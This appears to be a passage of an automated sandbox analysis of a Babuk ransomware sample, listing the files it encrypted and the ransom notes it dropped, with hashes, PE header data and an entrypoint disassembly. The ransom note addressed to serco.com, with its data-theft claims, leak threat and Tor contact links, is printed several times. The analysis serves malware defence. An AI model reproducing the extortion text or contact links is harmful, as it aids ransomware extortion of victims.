                                                                            Encrypted:false
                                                                            SSDEEP:24:ZzfSSHtL1ITb2mIKg8sA7s4we7Ory4APxhvV8E4H7AML:VfSk+H+KdsOYeqr+oL
                                                                            MD5:1B712C1C9DCD0779EDD1204B5A01575E
                                                                            SHA1:64CA4AF57F91BC8010EBBD940C5C06CC7F9C003A
                                                                            SHA-256:943FFDF1FB84F7659969148D2E97A65BD4E3F2A9038BE1B775F58D4C58E6936C
                                                                            SHA-512:9D541E88C111D666F1474DB3B53C52E83E5DA5007E7687D9923112BADA17A20A6543F1A589BA220C2530FDED15F120E1568D8B9B1CA5324B223BDD6D6DBFDBF8
                                                                            Malicious:false
                                                                            C:\Users\user\Favorites\Amazon.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):279
                                                                            Entropy (8bit):7.105063853075984
                                                                            Encrypted:false
                                                                            SSDEEP:6:t8B2hPzLe6L1gWRKrcaJD+oruJqfYvuh5RaX+VSBQbid0vtn:sELdXRKAm+orJquDaX+VOQbiK
                                                                            MD5:372B6A9512AF87B99110E470C6EC9BA6
                                                                            SHA1:984B9578F621C699CE2167F655CC2C2F9B4173F5
                                                                            SHA-256:EED80A2113BF8588ADB559E57D3446E024BCF0FE7B4E062F3D5E3AF31037FD62
                                                                            SHA-512:E9C3AE08C535FFF40C88FA9A1F3541528CEF25E7C4B434A11C29F5A1948E6EB551310A0DBD89318F09A828F08738C1416266CB626438A58230E3EB86190EBD61
                                                                            Malicious:false
                                                                            Preview: .w">Y..NV"_....<..bi...e.Cq...o.[....c.0.&......g...SK..:._z.D..y.7.SW.e.WJ...8@'Q86.g5....E.oz.|.bY.z.....m....!y..........P...k..O.xV7(-..F..J.4.X..I.......]...zv...b(.NM/?.....@..[..]...j...h.V.a}..........{..u.;..Tp.._..j....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Bing.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):376
                                                                            Entropy (8bit):7.373793532655735
                                                                            Encrypted:false
                                                                            SSDEEP:6:KDEdwZFkWvtByszkPQSOjiCJ9vJXejkG/IW/QG/5nLqNrjXbHZsrIb1CL0vtn:U0tW1ByLQfXxXtWIQ5KjXLJgs
                                                                            MD5:0A3B01C5EC66F9E62E259AA1EDC7554A
                                                                            SHA1:FD2F44A82CC55250A486254F23552A26F4ACF233
                                                                            SHA-256:E97EADA364285C9413B829532EE1C8EFFC8B80238F855574BAB4B497CA51992B
                                                                            SHA-512:E9C5C563BE02D20C3F550BEF01308EA866997E3F06118483EC2C555484B56E86D5CAF03DE6ADC6236789980FCB40E6A84E627A42C8E67C8BB5166A4791E56B7A
                                                                            Malicious:false
                                                                            Preview: .z.y.,.sUB...3'.*.x...Q....Q-.;.<T.}.'g,.....@.....!.E.._....0gIb..L.....QZfV.}..=..P......ws.......\..Q...u.~..o.MLh.RA..Pw..&d.`.....J.B......f.....K+.5.'...2v..~..1R9D.o....t..C.Z..u|..................v.._....p.&..6..4.....=Vs.......+.a?.h3..]...../...Ih...^.DC.h.......L..E*S..4<...+......T}.....z].O.EJ.4C....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Facebook.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):281
                                                                            Entropy (8bit):7.082753243954591
                                                                            Encrypted:false
                                                                            SSDEEP:6:WljOPhZqxm8fjwrYYmwi4mbt+5YARSC6+mO90vtn:WIPh0jwrYBuHa+mOq
                                                                            MD5:6586BA435DC884DC1D836C7AE22DC19B
                                                                            SHA1:8D9FA49884FB1829D8904E50225427DB7393672F
                                                                            SHA-256:30AAD30D15368CADE43DFB740054E501E6C746DD51B1431DE52B9E89ACCA9852
                                                                            SHA-512:6A1E615973BF9DCE45691C2BE19F3A975AED9A2465632142E511AD7B3704EA71B7362A3D29469DAB6F4B5034E838D8023EC21A8FF1562D64EA9EEBFBB9AF330E
                                                                            Malicious:false
                                                                            Preview: .f..MU.t....HW.~....#.Ed..,.L.OE...&.D!..@T.../.^..\K;..$../>=...p..) ..4E..$g...xsgH 1I..##.P..Gu..p.....q&q......\<.q?p..r.j.].f.......}.........$a.V.X.)....P&A...t...jh.I.Z.e..Y.^>zkf)HP`;B$....6.....7v.d!.O.W.@~I...}j.2.E.....*L.:....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Google.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):279
                                                                            Entropy (8bit):7.090726935513259
                                                                            Encrypted:false
                                                                            SSDEEP:6:jQfhsUM3xvfyjKFDINmLAo+c4YArRo8wd5hodO0vtn:jQs3xXsKlFTcYf7+b
                                                                            MD5:B472454ECE004117D6108C8B3983F335
                                                                            SHA1:EE9B71C832A45C48592F3C70BA657A58A89AD01D
                                                                            SHA-256:E95C12BF0ADBFC7602939E978CCB7652DEA909135010E94427258EA60D34963A
                                                                            SHA-512:93321143FEF121AA8A25C30C82AA7516F2D32CDEE2727E37F239B0F93F82B3C4A427CE0A51FC54D9FFB8472228E2B503D9420F5CE58003FE7F9C13900AFD7729
                                                                            Malicious:false
                                                                            Preview: .).m..da...pQ....K..n.D4...ihE.x.|qH*...V#>..|....!....e.W....2+..'&.....z.2gR..{y..t...h."a......u.s..}K......v.X*.<........W..CE..FIX...J^R.T...c..^.;.b N....yi..J...iw[S.S.d.HB..ih.......2.....mL...XM.vl>.......BL...,z.......z*.....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Favorites\Links\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Favorites\Live.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):277
                                                                            Entropy (8bit):6.979477422464105
                                                                            Encrypted:false
                                                                            SSDEEP:6:nSeTKFT9iPudvgEm90gs4VCGdb3OiSoxD/vNhtBr0vtn:Seqli90IMGB8oF/vNXe
                                                                            MD5:C56D28D96671CF1727CC01D5CD141FAD
                                                                            SHA1:EAC0B902CBC2D4D7FD89BD89720ED5F3A0296508
                                                                            SHA-256:E8D92EF91CCFF4F0219F1C599386F92815520901FB56EF4C73EAEE7882F2D0D6
                                                                            SHA-512:9BB2C8A3A8971438A38ECB60C99E9478FF0967D8420B7086121946E569401CD828D0C4B45DA7692C45596E2194A3DE7A2CBE1D4A783B153E34C73A3B3D79862D
                                                                            Malicious:false
                                                                            Preview: 9.|..!.(..b9....p Xi..o.>..2.j.M#...d...5..w..D...4....o.7,x......%..';.(..o.4..s.D..C.....n..0z.'..b.........<..0.R5...(..R......K.8. 5C.S...f.?...".Q...N....}e...P;.....i..<B...U...#D.=.R?. .....Z..N.u+g.~b....s.Y.C....~.1...),w....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\NYTimes.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):280
                                                                            Entropy (8bit):7.187840204552309
                                                                            Encrypted:false
                                                                            SSDEEP:6:nq8AAVUEnzGLx6c/542021bkcW6xXhHXl8S920vtn:q8TVUGz6ggNkcW2FVH
                                                                            MD5:D005D4770B51664E7E0C0067F5483898
                                                                            SHA1:F466B90DE60F22C2D7AC62932225F0895E2536BC
                                                                            SHA-256:F538355A581444496F2D3225EB90A7A36FB4D67E2796F31B044712923959E158
                                                                            SHA-512:4137072B7AAC7516F8A7DADC22A44735A2DE670EFF4D67EF30131840BFFE3F47DB08644E2DD90C7598A47576BEA44ADFA2A9A989B58917DABB95B1031B5C8F07
                                                                            Malicious:false
                                                                            Preview: .+.D.)..8...A...&.......KmA?A0.:..a../...G#.Y$..Z.7Y_..K."Z,.F..wv....^.D]T...0v...b....Q...g..f.xp.....'.sa..[.dZX2..K.3....H.\.v.q8k.7\.\.....[...3!.].V?..]Rq.T.>..\bG...-. /.......(tR...k......)2W.-.P~f...F.._.;.\...{0S........choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Reddit.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):279
                                                                            Entropy (8bit):7.06952210769644
                                                                            Encrypted:false
                                                                            SSDEEP:6:UOhsVoUWmDZAuZjASNQ3ggh7efhFN5p3m0L0vtn:3hsj1DZ7aUSLoD7Zs
                                                                            MD5:A51CC84582C4483B671BB4D14865E651
                                                                            SHA1:FC26A408E882B30827A4B2F3BA5A4355CD8E7579
                                                                            SHA-256:148CFB120A3368594C848AD326249D0F896FEE97454C2F7378044C10FD2DE5A9
                                                                            SHA-512:2C7EC87B8235DCCEEE01314FEE4EBAD55896C458D876601B34FCA86960672566B51C7CE72315E5A7B5B8702563ECFAAEFE2EA02B640924BB927F582D6A460007
                                                                            Malicious:false
                                                                            Preview: .t.....D...9..!...........e....U g...18]...L....%.......>Ihi....Y.$z.b.....6.k.[.gZf..d.u3..r.....AM.......O...y./%.#q.c)].6V...i...V.+.E.....#.&#...~..|.>.$..4.}..Q./...Y7..3wY..+N.c).DD].DvVf....U....WM.. &.....$.UV....;..$`.....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Twitter.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):280
                                                                            Entropy (8bit):7.089451365189329
                                                                            Encrypted:false
                                                                            SSDEEP:6:16A2zkWGkGxpsz9CKZOdHYOiIs9KODj4Cp3HkyDeMaxy3s80vtn:moNbszdhnR7UyKPxyc7
                                                                            MD5:0247157A3265DC759F8973493910A17D
                                                                            SHA1:454D159D840E013F04C240A413D5CB9882B17F03
                                                                            SHA-256:CD388C8A7CC6DC3594C8F1FD42A3ADFA60A30DC6CDD480C935648FD35726DD6A
                                                                            SHA-512:F0D3760510368FCBC6DCEE937B0C658514E0224DA7260468551C67321E1DCE8765BD9D09E6FA80564C69E9EB65A6DE9088879B13C88900AEF4D61F5952D344CD
                                                                            Malicious:false
                                                                            Preview: &.~0.......).O.........z...}.5<e..TSe.v.$....n.N.2@....(y`.....$}1L..S!Tfb.K....V1..z...b~.44..?!.*&..X....2.8..(.Ey-..xv.x.8E.^..4.....[...1....T,.+....$...../.b.......y.}..a..X.T...f.;L....;i..;:....T....K" I...~.#zv0G..O..o.w....choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Wikipedia.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):282
                                                                            Entropy (8bit):7.140519648404609
                                                                            Encrypted:false
                                                                            SSDEEP:6:kB3SHi76CaSYdASqnxsnQCHliBk5Lavri0vtn:kB3SCRaSYdAHgFp5LaDl
                                                                            MD5:BD7B8303B186B1E3D0B24964A7DEA1B3
                                                                            SHA1:7D6C84A8E206E1078D6EF91ED0F75D6D510E90EE
                                                                            SHA-256:7543A367E6F94B8567436FC2259C6C239D30564746A9C7CC1E5449A10B4C72BD
                                                                            SHA-512:59E89C4F863C083F0CDD227A47F8872C5401BB671B2EE31459FA3B245B00154F96962D18966DBAD4E7D6C46D6B2BC410F113E3A4C4A7048F243066A90A9FF161
                                                                            Malicious:false
                                                                            Preview: ......pD.... ..."gSR.q....Cc.,H...90......_BZ.....>0q.l....DbQH...4.8.mj..p~.6.&.M..........&........2........Xb... ..Dea...U0..t...L./......G$.g.6.3.n.4. ....1....5..J.........a.....O... ...Z.O...5......3....l....../._...yc........choung dong looks like hot dog!!
                                                                            C:\Users\user\Favorites\Youtube.url.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):280
                                                                            Entropy (8bit):7.043060106809963
                                                                            Encrypted:false
                                                                            SSDEEP:6:k9AVTezbt92+XslQfuK7S+kT96L4mA7OuyeWmGjwWXt50FQaL0vtn:KAVTk6+XAQfuK7FkTkcm0Y0Ls
                                                                            MD5:339781386103A4E7E3109317643937E5
                                                                            SHA1:8F4EA6580D1EB3306AF10043149C56C2607B31A6
                                                                            SHA-256:601CFAA6CD7B39A1FE79C61BFE399B2A022C18687023EE98FBFC6A12F3E9E749
                                                                            SHA-512:BB24E3140B2048F5E9C8DE0554AA1A9226C5044D39ABC9DBFB2BAF03000C0962A57252DC8226E5E736FE027BE07600503839D3799097FC3F041E3D06541950AF
                                                                            Malicious:false
                                                                            Preview: R..\l>.|Y`...(=y.?....g6-..J./ak_-F...e...^H..Z..T....d.C..F.^\j.G.O4..>).......-...od|......]k...5h..hT.fM.......x..j......%&...}m..f5.f...d..W....Xb..X..6...7...V.i}...Xl.]...fkn..>.K.Eh.7.P0..."5.<....y.s..A.B..+#.U|W...fF..M.\...)Y....choung dong looks like hot dog!!
                                                                            C:\Users\user\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            Preview: Hello! serco.com, we are the BABUK team and you have big security problems, we are not a government hackers, we are only interested in money. ..We've been surfing inside your network for about 3 weeks and copied more than 1 TB of your data. Down below you can see screenshots of the data we stole. We strongly recommend you to get us in touch and discuss the details of the future deal in our private chat: ....* How to contact us? ..---------------------------------------------- ..1) Download Tor browser: https://www.torproject.org/download/ ..2) Open it ..3) Follow this link in tor browser: http://babukq4e2p4wu4iq.onion/login.php?id=dKK7wnOiVHoXdqSrVcb1gxKpC9JICQ ......We can provide you any amount of proofs of data we stole, in case we do not come to any agreement or you won't text us in near five days, the data will be published in our blog. ....Links to this blog is private now, but how fast it become public depends only from you...http://gtmx56k4hutn3ikv.onion/?dUIel0o8kfjZf4zUHDbm..
                                                                            C:\Users\user\Links\Desktop.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):669
                                                                            Entropy (8bit):7.656937485204007
                                                                            Encrypted:false
                                                                            SSDEEP:12:ub8MN3+gvwc9CuuiJUweDR/8DQ69n03wjrISOOq+T0/ywT6xeR:g/x9buqUweO590I+J/1TlR
                                                                            MD5:D969A0C5BD5E177A2A064C903DB575EE
                                                                            SHA1:98BE2E507452B9601E8E61E7179A0020B23B8704
                                                                            SHA-256:8D6D22FD596701E35EAF9A5B05D64DE02619C9883109D578D3DF0FD3CA050603
                                                                            SHA-512:06FE49A2434F47ED61F175BBFD492CF2775B4AE4043B4841212ECD83B8908C6B7B2B4DD0BA92BE75FBAF1D44C0BBB03702776A623BE6080A67FDE01B8C846615
                                                                            Malicious:false
                                                                            Preview: (encrypted binary content; the preview ends with the string "choung dong looks like hot dog!!")
                                                                            C:\Users\user\Links\Downloads.lnk.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1118
                                                                            Entropy (8bit):7.811346624115402
                                                                            Encrypted:false
                                                                            SSDEEP:24:vbZVGfMY4ANMlTKKCIF6siIzYVymet2xG7aSaJ:vbvGGAHKF6s3Y0meMxnZ
                                                                            MD5:973BDB17DD84C2CB0488C4344E1D364D
                                                                            SHA1:5B41FF6A44C9AB9DFF97D56873AC33E28FB5364F
                                                                            SHA-256:0B682BB4F051E576A1794F64B31D1EED6EFBC24A1E6C9968B73194D03562EBCE
                                                                            SHA-512:06DBE8EFED527D5AD2FD04C803105AA14DF5646AD8C60300558CA204D3D400DAB414B4A4A7D40882BD3558941BA6214D52420D8ECD752B35C76C0FD7B8AC5949
                                                                            Malicious:false
                                                                            C:\Users\user\Links\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Music\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Pictures\Camera Roll\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Pictures\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\Users\user\Videos\How To Restore Your Files.txt
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):1916
                                                                            Entropy (8bit):4.893704863963044
                                                                            Encrypted:false
                                                                            SSDEEP:48:a3NuVOfDAggFky1lFrXdkNBHhYRKgbWIuIVI4IlIZeI6I9I8:aQEbASyFra/BYRtbTO9+Zj328
                                                                            MD5:8719A4F9E9FFD0B8B8B0B49134698B90
                                                                            SHA1:98CC50EEDEA6206A7EEDF8B8442AD9C10095B500
                                                                            SHA-256:DD5BA1629ECD99EE7B9F723E217D589E0FB7C84689973E5B5EFE45C5282BA7E7
                                                                            SHA-512:A1DDC7DF09EE37DAF0BDB04DAF0B509FA96D8F81D64D8582EEF65BE3707A0959D5E3BAC97C23598C66D5B912B4DCFFF4FB89B849E3599BBC68867092152416EF
                                                                            Malicious:false
                                                                            C:\bootTel.dat.babyk
                                                                            Process:C:\Users\user\Desktop\babuk_v5.exe
                                                                            File Type:Unknown
                                                                            Category:dropped
                                                                            Size (bytes):248
                                                                            Entropy (8bit):7.030508155318469
                                                                            Encrypted:false
                                                                            SSDEEP:6:ig6hTnFqSeKrET5OF/NXYrx1f0lQ6EFX5yhOaL0vtn:iy9TQEF1slQbFpysJ
                                                                            MD5:2FACD771F8EA6B9EC3B3249E3EC15080
                                                                            SHA1:F56158EF4DD88F9B70418958653C29AD651C4517
                                                                            SHA-256:F2E1EF7702B52B2FBD9A1F3CBA59CC2AF608E0BC3C7A6F16F2B43B75A3E31535
                                                                            SHA-512:4F74C6C1EE07041B52D1D22A8B8FFFB092BD968D163C90D50A9B284EF48D005067D041473005C719B3433B0BB8A1D0E8CA9F7BB06FC433D4B9F95294B32C6078
                                                                            Malicious:false
                                                                            Preview: (encrypted binary content; the preview ends with the string "choung dong looks like hot dog!!")

                                                                            Static File Info

                                                                            General

                                                                            File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                            Entropy (8bit):5.930729888759111
                                                                            TrID:
                                                                            • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                            • Generic Win/DOS Executable (2004/3) 0.02%
                                                                            • DOS Executable Generic (2002/1) 0.02%
                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                            File name:babuk_v5.exe
                                                                            File size:30208
                                                                            MD5:67e49cfcd12103b5ef2f9f331f092dbe
                                                                            SHA1:72cad5a81ce546b42844b5b8fc2ab55e99f2b5d4
                                                                            SHA256:58ccba4fb2b3ed8b5f92adddd6ee331a6afdedfc755145e0432a7cb324c28053
                                                                            SHA512:21fa0d1be0d5be2da8c4c68357e1e294503d87c21a304c5811669eaa9aba29b6cfcd077d083547e2f41269b12c6a8da5ad2ea0f1613d9a96917ea01c69fcb087
                                                                            SSDEEP:384:v2UsMH+SV5xjfd7IRfj1LKWQkD/e42pRwtkOEyOc0QI0rRrASD:PscR5x5kTKWQY/e42pKtkOETcfJrV
                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........?...l...l...l...m...l...m...l...m...l...l...lG..m...lG..m...lRich...l........................PE..L......`.................\.

                                                                            File Icon

                                                                            Icon Hash:00828e8e8686b000

                                                                            Static PE Info

                                                                            General

                                                                            Entrypoint:0x405ec0
                                                                            Entrypoint Section:.text
                                                                            Digitally signed:false
                                                                            Imagebase:0x400000
                                                                            Subsystem:windows gui
                                                                            Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                            DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                            Time Stamp:0x6011CFE3 [Wed Jan 27 20:41:07 2021 UTC]
                                                                            TLS Callbacks:
                                                                            CLR (.Net) Version:
                                                                            OS Version Major:6
                                                                            OS Version Minor:0
                                                                            File Version Major:6
                                                                            File Version Minor:0
                                                                            Subsystem Version Major:6
                                                                            Subsystem Version Minor:0
                                                                            Import Hash:e427e2333fa70c2cb1ef7892dc17f199

                                                                            Entrypoint Preview

                                                                            Instruction
                                                                            push ebp
                                                                            mov ebp, esp
                                                                            sub esp, 0000009Ch
                                                                            mov eax, dword ptr [004071C8h]
                                                                            xor eax, ebp
                                                                            mov dword ptr [ebp-04h], eax
                                                                            call 00007F32F87DF27Dh
                                                                            mov dword ptr [00407270h], eax
                                                                            cmp dword ptr [00407270h], 00000000h
                                                                            je 00007F32F87DF962h
                                                                            push 00407274h
                                                                            push 00000000h
                                                                            push 00000000h
                                                                            push 00000094h
                                                                            push 00401798h
                                                                            mov eax, dword ptr [00407270h]
                                                                            push eax
                                                                            call dword ptr [00408028h]
                                                                            push 00407278h
                                                                            call dword ptr [00408054h]
                                                                            mov dword ptr [ebp-2Ch], 00000000h
                                                                            lea ecx, dword ptr [ebp-2Ch]
                                                                            push ecx
                                                                            call dword ptr [00408070h]
                                                                            push eax
                                                                            call dword ptr [0040815Ch]
                                                                            mov dword ptr [ebp-68h], eax
                                                                            push 0040240Ch
                                                                            push 00000000h
                                                                            push 001F0001h
                                                                            call dword ptr [004080C4h]
                                                                            mov dword ptr [ebp-00000090h], eax
                                                                            cmp dword ptr [ebp-00000090h], 00000000h
                                                                            jne 00007F32F87DF319h
                                                                            push 0040242Ch
                                                                            push 00000000h
                                                                            push 00000000h
                                                                            call dword ptr [00408098h]
                                                                            mov dword ptr [ebp-00000090h], eax
                                                                            jmp 00007F32F87DF30Ah
                                                                            push 00000000h
                                                                            call dword ptr [004080A4h]
                                                                            push 00000000h
                                                                            push 00000000h
                                                                            call dword ptr [004080B0h]
                                                                            call 00007F32F87DF927h
                                                                            call 00007F32F87DDCC2h
                                                                            push 0040244Ch

                                                                            Data Directories

Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8174 | 0xa0 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xa000 | 0x464 | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x24b0 | 0x38 | .text
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x24e8 | 0x40 | .text
